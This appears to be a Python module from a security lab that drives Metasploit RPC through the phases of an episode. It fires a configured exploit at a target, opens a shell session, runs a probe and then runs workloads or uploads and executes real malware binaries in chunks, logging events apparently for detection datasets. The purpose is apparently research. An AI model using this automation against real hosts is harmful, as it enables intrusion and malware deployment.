"""Tier-3 exploit driver. Plugged into ``EpisodeRunner`` as the ``on_phase`` callback. Translates the closed phase enum into msfrpc actions: clean — idle. (no-op; exploit hasn't fired yet) armed — module loaded + options applied; module fires with ``module.execute``. Driver records the fire timestamp via ``emit_event`` so the labeler can align ``armed`` with what's actually happening. infecting — poll for a new session; on session_open, run a one-shot landing command (``id`` or similar) so we have a clear "session is responsive" event. infected_running — start observable workload inside the session. dormant — kill the workload, leave the session alive. reverting — kill session, snapshot revert handled by caller. The events the driver writes match the schema in ``docs/data-model.md``: ``exploit_fire``, ``session_open``, ``sample_executed``, ``session_dormant``, ``session_killed``. The driver does NOT author exploits or pick payloads at runtime — those choices live in ``exploits/modules/*.toml``. The driver is a pure adapter between the phase machine and msfrpc. """ from __future__ import annotations import logging import os import time from dataclasses import dataclass from typing import Callable from pathlib import Path from samples.manifest import Sample from .modules import ModuleConfig from .msfrpc import MSFRpcClient, wait_for_new_session from .workloads import ( ChunkedUpload, Workload, chunked_real_binary_upload, real_binary_workload, workload_for, ) log = logging.getLogger("cis490.exploits.driver") EmitEvent = Callable[..., None] @dataclass class DriverConfig: target_ip: str session_open_timeout_s: float = 30.0 # HOST_PORT for the module's service. When set, overrides RPORT in the # module's options so msfrpcd connects to the hostfwd'd loopback port # rather than the guest's privileged port directly. target_port: int | None = None # Driver v1 fallback workload — used only when no Sample is passed # in (Sample-driven runs override these via exploits.workloads). # We keep the v1 path so existing callers keep working unchanged. workload_cmd: str = "yes > /dev/null" workload_kill_cmd: str = "pkill yes; true" # Where staged real-malware binaries live on the lab host. sample_store_root: Path | None = None class MSFExploitDriver: """Phase-to-msfrpc adapter. One instance per episode. When constructed with a ``Sample``, the driver dispatches the ``infected_running`` / ``dormant`` workload through ``exploits.workloads`` so the in-session behaviour matches the sample's profile (cpu-saturate, scan-and-dial, io-walk, bursty-c2, low-and-slow, shell-resident). Without a sample, falls back to the v1 single-command workload — useful for the very first Tier-3 smoke runs.""" def __init__( self, client: MSFRpcClient, module: ModuleConfig, cfg: DriverConfig, emit_event: EmitEvent, *, sample: Sample | None = None, ) -> None: self.client = client self.module = module self.cfg = cfg self.emit = emit_event self.sample = sample # Chunked upload plan (None unless real binary path applies). self._chunked: ChunkedUpload | None = None self.workload: Workload | None = self._resolve_workload(sample) self._sessions_seen_at_arm: set[int] = set() self._session_id: int | None = None self._job_id: int | str | None = None self._fired = False def _resolve_workload(self, sample: Sample | None) -> Workload | None: """Pick the best workload for this sample: 1. real binary (if staged at samples/store/) → chunked upload + exec via dedicated dispatch path 2. profile mimic from exploits.workloads 3. None → driver v1 fallback (yes-loop) """ if sample is None: return None if sample.kind == "real" and self.cfg.sample_store_root is not None: bin_path = sample.binary_path(self.cfg.sample_store_root) if bin_path is not None: try: payload = bin_path.read_bytes() self._chunked = chunked_real_binary_upload(payload, sample=sample) # Return a Workload shell so the rest of the driver # can treat the dispatch uniformly. start_cmd is # never sent verbatim — _start_workload walks the # chunked plan instead. return Workload( profile=self._chunked.profile, start_cmd="(chunked-upload-managed-by-driver)", stop_cmd=self._chunked.stop_cmd, description=f"Real binary chunked upload+execute " f"({len(payload)} bytes, " f"{self._chunked.n_chunks} chunks)", ) except OSError as e: log.warning("could not read real sample %s: %s; falling back", bin_path, e) return workload_for(sample) # ---- lifecycle ------------------------------------------------------ def setup(self) -> None: """Authenticate and snapshot the pre-existing session set so we can recognize a *new* session as the one we just opened.""" self.client.login() self._sessions_seen_at_arm = set(self.client.session_list().keys()) self.emit( "driver_setup", module=self.module.module_path, payload=self.module.payload_path, target_ip=self.cfg.target_ip, preexisting_sessions=sorted(self._sessions_seen_at_arm), sample=self.sample.name if self.sample else None, sample_kind=self.sample.kind if self.sample else None, sample_sha256=self.sample.sha256 if self.sample else None, workload_profile=self.workload.profile if self.workload else None, ) def teardown(self) -> None: if self._session_id is not None: try: self.client.session_stop(self._session_id) self.emit("session_killed", session_id=self._session_id) except Exception: log.exception("session.stop on %s", self._session_id) if self._job_id is not None: try: self.client.job_stop(self._job_id) except Exception: log.debug("job.stop on %s (often already gone)", self._job_id) self.client.logout() # ---- phase callback ------------------------------------------------- def set_phase(self, phase: str) -> None: log.info("driver phase -> %s", phase) if phase == "clean": return if phase == "armed": self._fire() elif phase == "infecting": self._await_session() elif phase == "infected_running": self._start_workload() elif phase == "dormant": self._stop_workload() elif phase == "reverting": self.teardown() else: log.warning("unknown phase: %s", phase) # ---- actions -------------------------------------------------------- def _fire(self) -> None: if self._fired: log.debug("module already fired; skipping re-fire") return opts = self.module.render_options(target_ip=self.cfg.target_ip) if self.cfg.target_port is not None: opts["RPORT"] = self.cfg.target_port # Fleet sets FLEET_PAYLOAD_LPORT to the per-slot host port for # bind-shell payloads (cmd/unix/bind_perl etc.) so the handler # connects to the right hostfwd'd loopback port. fleet_lport = os.environ.get("FLEET_PAYLOAD_LPORT") if fleet_lport and "LPORT" in opts: opts["LPORT"] = int(fleet_lport) log.info("LPORT overridden to %s (FLEET_PAYLOAD_LPORT)", fleet_lport) self.emit( "exploit_fire", module=self.module.module_path, options={k: v for k, v in opts.items() if k != "PASSWORD"}, ) resp = self.client.module_execute( self.module.module_type, self.module.module_path, opts, ) self._job_id = resp.get("job_id") self._fired = True def _await_session(self) -> None: if self._session_id is not None: return result = wait_for_new_session( self.client, seen=self._sessions_seen_at_arm, timeout_s=self.cfg.session_open_timeout_s, ) if result is None: self.emit( "session_open_timeout", module=self.module.module_path, timeout_s=self.cfg.session_open_timeout_s, ) log.warning( "no session opened within %.1fs", self.cfg.session_open_timeout_s, ) return sid, info = result self._session_id = sid self.emit( "session_open", session_id=sid, session_type=info.get("type"), tunnel_peer=info.get("tunnel_peer"), ) # Landing probe so we have a known-good RTT marker on the wire. try: self.client.session_shell_write(sid, "id") time.sleep(0.5) out = self.client.session_shell_read(sid) self.emit("session_landing_probe", session_id=sid, output=out.strip()[:256]) except Exception: log.exception("landing probe on session %s", sid) def _start_workload(self) -> None: if self._session_id is None: log.warning("infected_running with no session — skipping workload") return if self._chunked is not None: self._upload_real_binary_chunked() return if self.workload is not None: # Driver v2 — profile-matched mimic workload. self.client.session_shell_write(self._session_id, self.workload.start_cmd) self.emit( "sample_executed", session_id=self._session_id, profile=self.workload.profile, description=self.workload.description, sample=self.sample.name if self.sample else None, ) else: # Driver v1 fallback. self.client.session_shell_write( self._session_id, f"nohup sh -c {_shquote(self.cfg.workload_cmd)} /dev/null 2>&1 & disown", ) self.emit( "sample_executed", session_id=self._session_id, command=self.cfg.workload_cmd, ) def _upload_real_binary_chunked(self) -> None: """Walk the ChunkedUpload plan: each chunk is a separate shell_write so msfrpc never sees a buffer-busting payload. Verifies the in-guest sha256 before exec; emits per-step events so we have a wire-level audit trail of Tier-4 runs.""" plan = self._chunked assert plan is not None and self._session_id is not None sid = self._session_id self.emit( "real_binary_upload_begin", session_id=sid, n_chunks=plan.n_chunks, sha256=plan.expected_sha256, sample=self.sample.name if self.sample else None, ) for i, chunk in enumerate(plan.chunks): self.client.session_shell_write(sid, chunk) # Read back so the next write doesn't race ahead of the # previous one's prompt return. We don't parse it. try: self.client.session_shell_read(sid) except Exception: pass # Decode + verify on the guest side. self.client.session_shell_write(sid, plan.finalize_cmd) try: verify_out = self.client.session_shell_read(sid) except Exception: verify_out = "" verified = "sha-ok" in verify_out self.emit( "real_binary_verify", session_id=sid, ok=verified, output=verify_out.strip()[:256], sha256=plan.expected_sha256, ) if not verified: self.emit("real_binary_aborted", session_id=sid, reason="sha mismatch") return # Launch. self.client.session_shell_write(sid, plan.exec_cmd) self.emit( "sample_executed", session_id=sid, profile=plan.profile, sample=self.sample.name if self.sample else None, sha256=plan.expected_sha256, kind="real", ) def _stop_workload(self) -> None: if self._session_id is None: return if self.workload is not None: self.client.session_shell_write(self._session_id, self.workload.stop_cmd) else: self.client.session_shell_write( self._session_id, self.cfg.workload_kill_cmd, ) self.emit( "session_dormant", session_id=self._session_id, profile=self.workload.profile if self.workload else None, ) def _shquote(s: str) -> str: # Minimal POSIX single-quote escaping. The workload command is set # by us, not by anything user-controlled, so we just need to handle # embedded single quotes correctly for completeness. return "'" + s.replace("'", "'\\''") + "'"